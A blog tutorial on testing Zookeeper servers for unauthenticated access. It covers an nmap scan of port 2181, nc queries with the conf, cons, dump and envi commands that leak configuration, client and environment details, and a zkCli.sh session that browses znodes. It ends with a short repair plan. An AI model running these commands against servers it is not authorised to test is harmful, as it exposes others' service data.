Zookeeper unauthorized access test problem

Preface
Detect Zookeeper service open
Get information
Connection Test
Connection target
Repair plan
refer to

Preface

ZooKeeper is a distributed, open source distributed application coordination service. It is an open source implementation of Google's Chubby and an important component of Hadoop and Hbase. It is a software that provides consistency services for distributed applications. Its functions include: configuration maintenance, domain name services, distributed synchronization, group services, etc.

Unauthorized access to Zookeeper means that no authentication is required by default after installation and deployment, which leads to remote exploitation of Zookeeper and a large amount of service-level information leakage.

The default ports used are: 2181, 2182.

Detect Zookeeper service open

For example, use nmap to detect whether a target address is running the Zookeeper service and detect whether port 2181 is open.

root@kali:~# nmap -Pn -p 2181 xx.xx.xx.xx
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-21 01:56 EDT
Nmap scan report for xx.xx.xx.xx.static.sz.js.chinamobile.com (xx.xx.xx.xx)
Host is up (0.016s latency).

PORT STATE SERVICE
2181/tcp open eforward

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Batch detection only requires modifying the corresponding target address.

Get information

conf Command

Output detailed information about related service configurations, including port, data path, log path, session timeout, maximum number of connections, etc.

root@kali:~# echo conf | nc xx.xx.xx.xx 2181
clientPort=2171
dataDir=/opt/data/zookeeper/data/version-2
dataLogDir=/opt/data/zookeeper/data/version-2
tickTime=2000
maxClientCnxns=0
minSessionTimeout=4000
maxSessionTimeout=40000
serverId=0

cons Command

Lists detailed information about all clients/sessions connected to the current server.

root@kali:~# echo cons | nc xx.xx.xx.xx 2181 | more
/10.23.46.40:11958[1](queued=0,recved=27317,sent=27317,sid=0x1000000e029b16e,lop=PING,est=1571277639586,to=40000,lcxid=0x33,lzxid=0x286a720,lresp=2435779043,llat=0,minlat=0,avglat=0,maxlat=397)
/10.23.46.39:9688[1](queued=0,recved=27316,sent=27316,sid=0x1000000e029b17c,lop=PING,est=1571277641790,to=40000,lcxid=0x33,lzxid=0x286a71c,lresp=2435777895,llat=0,minlat=0,avglat=0,maxlat=560)

dump Command

Output unprocessed sessions and temporary nodes, leader node is valid.

root@kali:~# echo dump | nc xx.xx.xx.xx 2181 | more
SessionTracker dump:
Session Sets (21):
0 expires at Thu Jan 29 12:38:08 CST 1970:
0 expires at Thu Jan 29 12:38:10 CST 1970:
3 expires at Thu Jan 29 12:38:12 CST 1970:
0x1000000e01f0013
0x1000000e029fdde
0x1000000e029fe05
2 expires at Thu Jan 29 12:38:14 CST 1970:
0x1000000e02a4235
0x1000000e01f00e9
31 expires at Thu Jan 29 12:38:16 CST 1970:
0x1000000e01f067a
0x1000000e02a423c
0x1000000e01f0008
0x1000000e029fdf4
...

Non-leader nodes cannot see any relevant information.

envi Command

Prints detailed information about the server.

root@kali:~# echo envi | nc xx.xx.xx.xx 2181
Environment:
zookeeper.version=3.4.13-2d71af4dbe22557fda74f9a9b4309b15a7487f03, built on 06/29/2018 04:05 GMT
host.name=c1b69852-ac24-11e8-88d9-a4bf01306d06
java.version=1.7.0_80
java.vendor=Oracle Corporation
java.home=/usr/java/jdk1.7.0_80/jre
java.class.path=/opt/midware/zookeeper/bin/../build/classes:/opt/midware/zookeeper/bin/../build/lib/*.jar:/opt/midware/zookeeper/bin/../lib/slf4j-log4j12-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/slf4j-api-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/netty-3.10.6.Final.jar:/opt/midware/zookeeper/bin/../lib/log4j-1.2.17.jar:/opt/midware/zookeeper/bin/../lib/jline-0.9.94.jar:/opt/midware/zookeeper/bin/../lib/audience-annotations-0.5.0.jar:/opt/midware/zookeeper/bin/../zookeeper-3.4.13.jar:/opt/midware/zookeeper/bin/../src/java/lib/*.jar:/opt/midware/zookeeper/bin/../conf:
java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
java.io.tmpdir=/tmp
java.compiler=<NA>
os.name=Linux
os.arch=amd64
os.version=3.10.0-327.36.3.el7.x86_64
user.name=root
user.home=/root
user.dir=/

Connection Test

Installation Tools

For example, in Kali, you can use the following command to install the zookeeper tool, and then you can use the client connection tool zkCli.sh.

# apt-get install zookeeper
...
#root@kali:~# cd /usr/share/zookeeper/bin/
#root@kali:/usr/share/zookeeper/bin# ls
zkCleanup.sh zkCli.sh zkEnv.sh zkServer.sh

Connection target

Use the -server parameter to specify the target to connect to.

root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181
Connecting to xx.xx.xx.xx:2181
Welcome to ZooKeeper!
JLine support is enabled
[zk: xx.xx.xx.xx:2181(CONNECTING) 0]

... connected

Get system related information

root@kali:/usr/share/zookeeper/bin# ./zkCli.sh -server xx.xx.xx.xx:2181
Connecting to xx.xx.xx.xx:2181
Welcome to ZooKeeper!
JLine support is enabled
[zk: xx.xx.xx.xx:2181(CONNECTING) 0]
WATCHER::
WatchedEvent state:SyncConnected type:None path:null
[zk: xx.xx.xx.xx:2181(CONNECTED) 0] ls /
[service, pms, DsMaster, Resource, monitor_lock, zookeeper]
[zk: xx.xx.xx.xx:2181(CONNECTED) 1] get /
cZxid = 0x0
ctime = Wed Dec 31 19:00:00 EST 1969
mZxid = 0x0
mtime = Wed Dec 31 19:00:00 EST 1969
pZxid = 0x4c0
cversion = 4
dataVersion = 0
aclVersion = 0
ephemeralOwner = 0x0
dataLength = 0
numChildren = 6
[zk: xx.xx.xx.xx:2181(CONNECTED) 2] get /service
cZxid = 0x2
ctime = Thu Aug 30 02:58:40 EDT 2018
mZxid = 0x2
mtime = Thu Aug 30 02:58:40 EDT 2018
pZxid = 0x1cb884d
cversion = 7
dataVersion = 0
aclVersion = 0
ephemeralOwner = 0x0
dataLength = 0
numChildren = 3
[zk: xx.xx.xx.xx:2181(CONNECTED) 3] getAcl /
'world,'anyone
: cdrwa

Repair plan

1. Set up firewall policies to limit IP access [This solution is recommended]

2. Do not expose Zookeeper to the external network

3. Set up user authentication and ACL

refer to

Zookeeper unauthorized access

http://vic.pub/zookeeper-unauthorized-access/

Summarize

The above is the Zookeeper unauthorized access test problem introduced by the editor. I hope it will be helpful to everyone. If you have any questions, please leave me a message and the editor will reply to you in time. I would also like to thank everyone for their support of the 123WORDPRESS.COM website!
If you find this article helpful, please feel free to reprint it and please indicate the source. Thank you!

You may also be interested in:

2020 latest IDEA SpringBoot integration Dubbo implementation (zookeeper version)
SpringBoot series tutorials: dubbo and Zookeeper integration method
Python implements distributed service code analysis through zookeeper
Detailed explanation of sample code for operating Zookeeper in Java
Install Zookeeper under Docker (standalone and cluster)
Detailed usage of Java zookeeper graphical tool ZooInspector
The most convenient way to build a Zookeeper server in history (recommended)
Introduction to the viper configuration framework supports zookeeper reading and monitoring
Windows Zookeeper installation process and startup diagram

<<: MySQL 8.0.15 installation and configuration method graphic tutorial under Windows

>>: Implementation of the login page of Vue actual combat record